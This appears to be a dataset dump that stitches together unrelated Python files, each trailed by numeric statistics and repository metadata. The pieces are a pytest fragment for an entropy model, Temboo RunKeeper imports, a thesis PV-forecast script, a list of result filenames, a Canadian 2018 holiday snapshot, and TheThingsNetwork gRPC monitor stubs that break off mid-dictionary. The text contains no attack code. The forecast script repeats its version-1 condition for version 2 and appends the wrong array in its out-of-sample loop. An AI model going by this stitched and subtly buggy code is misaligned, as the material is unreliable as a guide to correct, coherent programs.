high_entropy = basic_model.compute_entropy(['item 0', 'item 1'])
assert high_entropy
assert low_entropy
def test_compute_entropy_automatic_inference(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
low_entropy = basic_model.compute_entropy(['item 0', 'item 2'])
high_entropy = basic_model.compute_entropy(['item 0', 'item 1'])
assert high_entropy
assert low_entropy
if __name__ == '__main__':
pytest.main()
| 37.216783 | 111 | 0.727828 | 1,590 | 10,644 | 4.568553 | 0.06478 | 0.254681 | 0.066217 | 0.0837 | 0.875964 | 0.842511 | 0.819934 | 0.782489 | 0.765419 | 0.742979 | 0 | 0.031092 | 0.14487 | 10,644 | 285 | 112 | 37.347368 | 0.766974 | 0 | 0 | 0.64186 | 0 | 0 | 0.064356 | 0 | 0 | 0 | 0 | 0 | 0.246512 | 1 | 0.153488 | false | 0 | 0.023256 | 0 | 0.181395 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d6ef60b84a8acfe2d9804e9cbdb4b2474a583cb8 | 1,018 | py | Python | temboo/core/Library/RunKeeper/GeneralMeasurements/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/RunKeeper/GeneralMeasurements/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/RunKeeper/GeneralMeasurements/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.RunKeeper.GeneralMeasurements.CreateEntry import CreateEntry, CreateEntryInputSet, CreateEntryResultSet, CreateEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.DeleteEntry import DeleteEntry, DeleteEntryInputSet, DeleteEntryResultSet, DeleteEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveEntries import RetrieveEntries, RetrieveEntriesInputSet, RetrieveEntriesResultSet, RetrieveEntriesChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveEntry import RetrieveEntry, RetrieveEntryInputSet, RetrieveEntryResultSet, RetrieveEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.RetrieveLatestEntry import RetrieveLatestEntry, RetrieveLatestEntryInputSet, RetrieveLatestEntryResultSet, RetrieveLatestEntryChoreographyExecution
from temboo.Library.RunKeeper.GeneralMeasurements.UpdateEntry import UpdateEntry, UpdateEntryInputSet, UpdateEntryResultSet, UpdateEntryChoreographyExecution
| 145.428571 | 197 | 0.917485 | 66 | 1,018 | 14.151515 | 0.454545 | 0.06424 | 0.109208 | 0.167024 | 0.289079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041257 | 1,018 | 6 | 198 | 169.666667 | 0.956967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ba5c33f31138762e424390165b9e549b469d45ba | 7,447 | py | Python | forecast.py | ID-EDGe/DR-CC-tool | 0bc32f4677666a64555c9ddbcdc50d368024882e | [
"MIT"
] | 3 | 2021-06-22T05:40:31.000Z | 2022-03-04T12:26:13.000Z | forecast.py | ID-EDGe/DR-CC-tool | 0bc32f4677666a64555c9ddbcdc50d368024882e | [
"MIT"
] | null | null | null | forecast.py | ID-EDGe/DR-CC-tool | 0bc32f4677666a64555c9ddbcdc50d368024882e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Master Thesis Dominic Scotoni
PV Forecast File
Versions:
1: Gaussian Samples out-of-sample
2: Gaussian Samples in-sample
"""
###############################################################################
## IMPORT PACKAGES & SCRIPTS ##
###############################################################################
### PACKAGES ###
import numpy as np
import pandas as pd
import pickle as pkl
### SCRIPTS ###
import param as pm
###############################################################################
## PV FORECAST ##
###############################################################################
def pv_fcst():
### VERSION 1 ###
if pm.V_FCST == 1:
nSamples = 10000 # define number of samples
# forecast , change angles for extending solar hours
if pm.FCSTCASE[0] == 'summer':
pvMuRaw = 0.57*np.sin(np.linspace(-np.deg2rad(40),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))
elif pm.FCSTCASE[0] == 'winter':
pvMuRaw = 0.35*np.sin(np.linspace(-np.deg2rad(65),\
np.pi+np.deg2rad(85),\
int(24/pm.TIMESTEP)))
# remove very small values
pvMuRaw[pvMuRaw < 1e-5] = 0
# standard deviation
pvSigmaRaw = 0.25*np.sin(np.linspace(-np.deg2rad(35),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))*pvMuRaw
pvSigmaRaw[pvSigmaRaw < 1e-5] = 0
# daily profile according to mean and standard deviation above
pvDaily = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvDailyFiltered = np.zeros((int(24/pm.TIMESTEP),1))
for i in range(nSamples):
if np.any(pvDaily[:,i] > 1):
pvDailyFiltered
else:
pvDailyFiltered = np.append(pvDailyFiltered,\
pvDaily[:,i]\
.reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
# average PV production
pvMu = pvMuRaw[t_start:t_end]
pvSigma = pvSigmaRaw[t_start:t_end]
# for pkl export
dataFcst = pvDailyFiltered[t_start:t_end,1:]
###################################################################
## OUT-OF-SAMPLE ANALYSIS ##
###################################################################
pvMC = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvMCFiltered = np.zeros((int(24/pm.TIMESTEP),1))
for i in range(nSamples):
if np.any(pvMC[:,i] > 1):
pvMCFiltered
else:
pvMCFiltered = np.append(pvMCFiltered,\
pvDaily[:,i]\
.reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
dataMC = pvMCFiltered[t_start:t_end,1:]
###################################################################
## EXPORT PKL ##
###################################################################
export = [pvMu, pvSigma, dataMC, dataFcst]
fcstFile = 'src/fcst/forecastPV_v%s_%s_t%s.pkl'\
%(pm.V_FCST,pm.FCSTCASE[0],pm.T)
output = open(fcstFile, 'wb') # create output file
pkl.dump(export, output) # write data to output file
output.close() # close output file
### VERSION 2 ###
if pm.V_FCST == 1:
nSamples = 10000 # define number of samples
# forecast , change angles for extending solar hours
if pm.FCSTCASE[0] == 'summer':
pvMuRaw = 0.57*np.sin(np.linspace(-np.deg2rad(40),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))
elif pm.FCSTCASE[0] == 'winter':
pvMuRaw = 0.35*np.sin(np.linspace(-np.deg2rad(65),\
np.pi+np.deg2rad(85),\
int(24/pm.TIMESTEP)))
# remove very small values
pvMuRaw[pvMuRaw < 1e-5] = 0
# standard deviation
pvSigmaRaw = 0.25*np.sin(np.linspace(-np.deg2rad(35),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))*pvMuRaw
pvSigmaRaw[pvSigmaRaw < 1e-5] = 0
# daily profile according to mean and standard deviation above
pvDaily = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvDailyFiltered = np.zeros((int(24/pm.TIMESTEP),1))
for i in range(nSamples):
if np.any(pvDaily[:,i] > 1):
pvDailyFiltered
else:
pvDailyFiltered = np.append(pvDailyFiltered,\
pvDaily[:,i]\
.reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
# average PV production
pvMu = pvMuRaw[t_start:t_end]
pvSigma = pvSigmaRaw[t_start:t_end]
# for pkl export
dataFcst = pvDailyFiltered[t_start:t_end,1:]
###################################################################
## IN-SAMPLE ANALYSIS ##
###################################################################
dataMC = dataFcst
###################################################################
## EXPORT PKL ##
###################################################################
export = [pvMu, pvSigma, dataMC, dataFcst]
fcstFile = 'src/fcst/forecastPV_v%s_%s_t%s.pkl'\
%(pm.V_FCST,pm.FCSTCASE[0],pm.T)
output = open(fcstFile, 'wb') # create output file
pkl.dump(export, output) # write data to output file
output.close() # close output file
return pvMu, pvSigma, dataMC, dataFcst | 39.402116 | 81 | 0.399758 | 701 | 7,447 | 4.189729 | 0.18117 | 0.061287 | 0.035751 | 0.076609 | 0.860061 | 0.856316 | 0.856316 | 0.856316 | 0.856316 | 0.856316 | 0 | 0.036695 | 0.388881 | 7,447 | 189 | 82 | 39.402116 | 0.608657 | 0.143011 | 0 | 0.863158 | 0 | 0 | 0.0183 | 0.012962 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010526 | false | 0 | 0.042105 | 0 | 0.063158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2452dbc0e06041d5e4575c41990fd7047267ce19 | 439 | py | Python | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | resnet18=[
'2021_03_12_10_43_39_adam_ngd_lr_0.01_gamma_0.8_frac_1.0_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt'
'2021_03_12_15_13_20_adam_ngd_lr_0.01_gamma_0.8_frac_0.95_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt'
'2021_03_12_18_44_47_sgd_lr_0.1_gamma_0.8_frac_1.0_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt']
| 87.8 | 144 | 0.949886 | 96 | 439 | 3.479167 | 0.364583 | 0.143713 | 0.071856 | 0.098802 | 0.868263 | 0.868263 | 0.868263 | 0.868263 | 0.868263 | 0.763473 | 0 | 0.232184 | 0.009112 | 439 | 4 | 145 | 109.75 | 0.535632 | 0 | 0 | 0 | 0 | 0 | 0.952164 | 0.952164 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
2468a4e2c2394f509cb0aa77def5d3e737161d32 | 8,267 | py | Python | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 32 | 2019-04-12T08:01:34.000Z | 2022-02-28T04:41:50.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 74 | 2019-07-09T16:35:20.000Z | 2022-03-09T16:41:34.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 20 | 2019-01-28T07:41:02.000Z | 2022-02-16T02:38:57.000Z | [
{
'date': '2018-01-01',
'description': "New Year's Day",
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Louis Riel Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Islander Day',
'locale': 'en-CA',
'notes': '',
'region': 'PE',
'type': 'V'
},
{
'date': '2018-03-30',
'description': 'Good Friday',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'RV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'PE',
'type': 'RV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'RV'
},
{
'date': '2018-05-21',
'description': "National Patriots' Day",
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NS',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'YT',
'type': 'V'
},
{
'date': '2018-06-24',
'description': 'National Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'F'
},
{
'date': '2018-07-01',
'description': 'Canada Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-08-06',
'description': 'August Civic Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'August Civic Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Saskatchewan Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Heritage Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Heritage Day',
'locale': 'en-CA',
'notes': '',
'region': 'NS',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'New Brunswick Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'V'
},
{
'date': '2018-09-03',
'description': 'Labour Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NL',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'YT',
'type': 'V'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NL',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'F'
},
{
'date': '2018-12-25',
'description': 'Christmas Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2018-12-26',
'description': 'Boxing Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRF'
}
] | 21.87037 | 48 | 0.362042 | 706 | 8,267 | 4.239377 | 0.104816 | 0.125626 | 0.157033 | 0.23555 | 0.91146 | 0.903775 | 0.892082 | 0.841296 | 0.815236 | 0.815236 | 0 | 0.076376 | 0.4045 | 8,267 | 378 | 49 | 21.87037 | 0.531586 | 0 | 0 | 0.690476 | 0 | 0 | 0.385704 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
302e8293d15aef4573b02f8959843983c1b9fc1b | 11,552 | py | Python | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 32 | 2017-11-01T16:03:48.000Z | 2021-11-16T12:35:34.000Z | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 28 | 2017-11-20T09:45:59.000Z | 2021-12-14T09:31:24.000Z | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 22 | 2017-11-03T10:21:50.000Z | 2021-04-08T05:20:51.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from ttn.github_com.TheThingsNetwork.api.broker import broker_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2
from ttn.github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from ttn.github_com.TheThingsNetwork.api.handler import handler_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2
from ttn.github_com.TheThingsNetwork.api.networkserver import networkserver_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2
from ttn.github_com.TheThingsNetwork.api.router import router_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class MonitorStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.RouterStatus = channel.stream_unary(
'/monitor.Monitor/RouterStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayStatus = channel.stream_unary(
'/monitor.Monitor/GatewayStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayUplink = channel.stream_unary(
'/monitor.Monitor/GatewayUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.UplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayDownlink = channel.stream_unary(
'/monitor.Monitor/GatewayDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerStatus = channel.stream_unary(
'/monitor.Monitor/BrokerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerUplink = channel.stream_unary(
'/monitor.Monitor/BrokerUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerDownlink = channel.stream_unary(
'/monitor.Monitor/BrokerDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerStatus = channel.stream_unary(
'/monitor.Monitor/HandlerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerUplink = channel.stream_unary(
'/monitor.Monitor/HandlerUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerDownlink = channel.stream_unary(
'/monitor.Monitor/HandlerDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.NetworkServerStatus = channel.stream_unary(
'/monitor.Monitor/NetworkServerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MonitorServicer(object):
# missing associated documentation comment in .proto file
pass
def RouterStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def NetworkServerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MonitorServicer_to_server(servicer, server):
rpc_method_handlers = {
'RouterStatus': grpc.stream_unary_rpc_method_handler(
servicer.RouterStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayStatus': grpc.stream_unary_rpc_method_handler(
servicer.GatewayStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayUplink': grpc.stream_unary_rpc_method_handler(
servicer.GatewayUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.UplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayDownlink': grpc.stream_unary_rpc_method_handler(
servicer.GatewayDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerStatus': grpc.stream_unary_rpc_method_handler(
servicer.BrokerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerUplink': grpc.stream_unary_rpc_method_handler(
servicer.BrokerUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerDownlink': grpc.stream_unary_rpc_method_handler(
servicer.BrokerDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'HandlerStatus': grpc.stream_unary_rpc_method_handler(
servicer.HandlerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'HandlerUplink': grpc.stream_unary_rpc_method_handler(
servicer.HandlerUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
